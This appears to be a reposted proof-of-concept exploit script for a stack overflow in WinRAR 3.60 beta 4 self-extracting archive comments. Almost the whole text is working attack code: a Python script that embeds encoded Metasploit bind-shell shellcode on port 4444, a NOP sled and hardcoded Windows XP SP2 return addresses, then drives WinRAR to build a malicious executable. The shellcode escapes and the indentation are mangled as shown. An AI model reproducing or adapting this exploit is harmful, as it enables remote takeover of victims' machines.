[EXP]WinRAR – Stack Overflows in SelF – eXtracting Archives 's

信息来源：T4nk

WinRAR – Stack Overflows in SelF – eXtracting Archives
======================================================

Tested Version(s)..: WinRAR 3.60 beta 4
Original Author………….: posidron
Shellcode Stuffing ………: muts

XP SP2 French return address : JA

"""

import os, sys

winrar__ = 'C:/WinRAR.exe'
sfxnfo__ = "comment.txt"
result__ = "sample.exe"

# win32_bind – EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */

sc = "/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x4f/x49/x49/x49/x49/x49"
sc +="/x49/x51/x5a/x56/x54/x58/x36/x33/x30/x56/x58/x34/x41/x30/x42/x36"
sc +="/x48/x48/x30/x42/x33/x30/x42/x43/x56/x58/x32/x42/x44/x42/x48/x34"
sc +="/x41/x32/x41/x44/x30/x41/x44/x54/x42/x44/x51/x42/x30/x41/x44/x41"
sc +="/x56/x58/x34/x5a/x38/x42/x44/x4a/x4f/x4d/x4e/x4f/x4c/x36/x4b/x4e"
sc +="/x4d/x34/x4a/x4e/x49/x4f/x4f/x4f/x4f/x4f/x4f/x4f/x42/x56/x4b/x58"
sc +="/x4e/x36/x46/x32/x46/x42/x4b/x58/x45/x44/x4e/x43/x4b/x58/x4e/x37"
sc +="/x45/x30/x4a/x47/x41/x50/x4f/x4e/x4b/x58/x4f/x54/x4a/x41/x4b/x48"
sc +="/x4f/x35/x42/x52/x41/x50/x4b/x4e/x49/x44/x4b/x48/x46/x53/x4b/x58"
sc +="/x41/x50/x50/x4e/x41/x43/x42/x4c/x49/x59/x4e/x4a/x46/x48/x42/x4c"
sc +="/x46/x57/x47/x30/x41/x4c/x4c/x4c/x4d/x30/x41/x50/x44/x4c/x4b/x4e"
sc +="/x46/x4f/x4b/x43/x46/x55/x46/x52/x4a/x52/x45/x47/x45/x4e/x4b/x48"
sc +="/x4f/x35/x46/x32/x41/x50/x4b/x4e/x48/x46/x4b/x48/x4e/x30/x4b/x54"
sc +="/x4b/x48/x4f/x55/x4e/x31/x41/x30/x4b/x4e/x43/x30/x4e/x42/x4b/x48"
sc +="/x49/x48/x4e/x56/x46/x42/x4e/x41/x41/x46/x43/x4c/x41/x33/x4b/x4d"
sc +="/x46/x36/x4b/x38/x43/x34/x42/x53/x4b/x48/x42/x54/x4e/x50/x4b/x48"
sc +="/x42/x37/x4e/x31/x4d/x4a/x4b/x48/x42/x44/x4a/x30/x50/x35/x4a/x36"
sc +="/x50/x38/x50/x44/x50/x30/x4e/x4e/x42/x35/x4f/x4f/x48/x4d/x48/x56"
sc +="/x43/x55/x48/x46/x4a/x46/x43/x33/x44/x53/x4a/x56/x47/x57/x43/x57"
sc +="/x44/x43/x4f/x45/x46/x45/x4f/x4f/x42/x4d/x4a/x36/x4b/x4c/x4d/x4e"
sc +="/x4e/x4f/x4b/x33/x42/x55/x4f/x4f/x48/x4d/x4f/x45/x49/x58/x45/x4e"
sc +="/x48/x46/x41/x58/x4d/x4e/x4a/x50/x44/x30/x45/x35/x4c/x56/x44/x50"
sc +="/x4f/x4f/x42/x4d/x4a/x46/x49/x4d/x49/x30/x45/x4f/x4d/x4a/x47/x45"
sc +="/x4f/x4f/x48/x4d/x43/x35/x43/x45/x43/x55/x43/x55/x43/x45/x43/x34"
sc +="/x43/x45/x43/x54/x43/x55/x4f/x4f/x42/x4d/x48/x36/x4a/x46/x41/x51"
sc +="/x4e/x35/x48/x56/x43/x45/x49/x38/x41/x4e/x45/x59/x4a/x56/x46/x4a"
sc +="/x4c/x51/x42/x57/x47/x4c/x47/x55/x4f/x4f/x48/x4d/x4c/x36/x42/x51"
sc +="/x41/x45/x45/x35/x4f/x4f/x42/x4d/x4a/x56/x46/x4a/x4d/x4a/x50/x32"
sc +="/x49/x4e/x47/x55/x4f/x4f/x48/x4d/x43/x55/x45/x55/x4f/x4f/x42/x4d"
sc +="/x4a/x36/x45/x4e/x49/x44/x48/x38/x49/x34/x47/x55/x4f/x4f/x48/x4d"
sc +="/x42/x55/x46/x55/x46/x45/x45/x55/x4f/x4f/x42/x4d/x43/x39/x4a/x46"
sc +="/x47/x4e/x49/x47/x48/x4c/x49/x37/x47/x55/x4f/x4f/x48/x4d/x45/x45"
sc +="/x4f/x4f/x42/x4d/x48/x36/x4c/x46/x46/x56/x48/x56/x4a/x36/x43/x36"
sc +="/x4d/x36/x49/x38/x45/x4e/x4c/x56/x42/x55/x49/x35/x49/x32/x4e/x4c"
sc +="/x49/x58/x47/x4e/x4c/x46/x46/x34/x49/x58/x44/x4e/x41/x33/x42/x4c"
sc +="/x43/x4f/x4c/x4a/x50/x4f/x44/x54/x4d/x32/x50/x4f/x44/x54/x4e/x32"
sc +="/x43/x59/x4d/x48/x4c/x37/x4a/x53/x4b/x4a/x4b/x4a/x4b/x4a/x4a/x46"
sc +="/x44/x47/x50/x4f/x43/x4b/x48/x31/x4f/x4f/x45/x57/x46/x44/x4f/x4f"
sc +="/x48/x4d/x4b/x55/x47/x45/x44/x55/x41/x55/x41/x45/x41/x45/x4c/x56"
sc +="/x41/x30/x41/x35/x41/x55/x45/x45/x41/x55/x4f/x4f/x42/x4d/x4a/x56"
sc +="/x4d/x4a/x49/x4d/x45/x50/x50/x4c/x43/x35/x4f/x4f/x48/x4d/x4c/x46"
sc +="/x4f/x4f/x4f/x4f/x47/x33/x4f/x4f/x42/x4d/x4b/x38/x47/x35/x4e/x4f"
sc +="/x43/x58/x46/x4c/x46/x56/x4f/x4f/x48/x4d/x44/x55/x4f/x4f/x42/x4d"
sc +="/x4a/x46/x42/x4f/x4c/x38/x46/x30/x4f/x45/x43/x55/x4f/x4f/x48/x4d"
sc +="/x4f/x4f/x42/x4d/x5a"

#buf = "Path=" + "/x90" * (2035-len(sc)) +sc+ "/x3c/x15/xdc/x77" + "/x90" * 8 + "/xEB/x30/x90/x90" + "/r/nSavePath/r/n" # JMP ESP XP SP2
buf = "Path=" + "/x90" * (2035-len(sc)) +sc+ "/x5D/x38/x82/x7C" + "/x90" * 8 + "/xEB/x30/x90/x90" + "/r/nSavePath/r/n" # 0x7C82385D call ESP Kernel32 XP SP2 FRENCH

try:
info = open(sfxnfo__, "w+b")
info.write(buf)
info.close()
except IOError:
sys.exit("Error: unable to create: " + sfxnfo__)

print "Creating archive:",
os.spawnv(os.P_WAIT, winrar__, [winrar__, "a -sfx -s " + result__ + " " + __file__])
os.spawnv(os.P_WAIT, winrar__, [winrar__, "c -z" + sfxnfo__ + " " + result__])
print "done."
print "Executing:",
# debug only!
#os.spawnv(os.P_WAIT, result__, [result__, ""])
#print "done."
print "Cleaning up:",
os.remove(sfxnfo__)
print "done."